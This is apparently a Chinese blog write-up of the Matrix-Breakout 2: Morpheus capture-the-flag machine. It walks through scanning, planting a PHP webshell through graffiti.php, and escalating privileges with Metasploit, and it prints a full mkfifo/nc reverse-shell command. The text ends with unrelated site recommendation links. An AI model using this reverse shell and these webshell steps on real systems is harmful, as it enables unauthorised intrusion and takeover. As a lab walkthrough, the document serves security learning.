matrix-breakout-2-morpheus靶机通关

1.目标探测

目标开启了22、80和81端口,其中81端口需要登陆

2.目录探测

使用gobuster探测,字典很重要哈,我之前选了几个简单的,没有爆出来

发现了graffiti.php这个涂鸦界面,可以写一句话代码

写入成功后,用bp拦截,把txt文件改成php,这样就可以执行一句话木马了。

3.建立shell

采用蚁剑连接后,可以建立shell,可以看到第一个flag,但只有www-data权限

当然也可以用nc建立一个反弹shell,nc -e被禁用了,只能采取这样的方式:

复制代码
rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | nc 192.168.136.204 1234 > /tmp/f

4.建立meterpretershell

生成木马

利用第3步建立的shell上传该木马,并执行。

msf监听

5.使用提权模块

搜索local_exploit

输入meterpreter会话的session id,

发现可利用的提权漏洞,直接选用这个模块,提权

6.溯源情况

相关推荐
盐焗鹌鹑蛋23 分钟前
【Linux】进程控制
linux
微三云 - 廖会灵 (私域系统开发)1 小时前
抖店 OPC 自动化运营系统架构与商业代理分控体系完整解析
运维·系统架构·自动化
G31135422731 小时前
大模型不可用时,业务还能不能继续:企业需要设计降级方案
大数据·服务器·数据库·人工智能·深度学习
办公室马主任2 小时前
华南机械加工企业选MES服务商怎么选?
大数据·运维·人工智能·制造
盐焗鹌鹑蛋2 小时前
【Linux】进程程序替换
linux
鸠摩智首席音效师2 小时前
Warning: apt-key is deprecated. Manage keyring files in trusted.gpg.d instead
linux
小陈同学!!3 小时前
防火墙双机热备实验
运维·服务器
tianyuanwo3 小时前
DevOps主机管理员视角:企业级Linux主机权限管理策略与实践
linux·服务器·devops
郭涤生3 小时前
Windows + Ubuntu 双系统启动故障修复
linux·windows·ubuntu
三言老师3 小时前
CentOS8 Firewalld 高级规则中级实操教程
linux·运维·服务器·网络·centos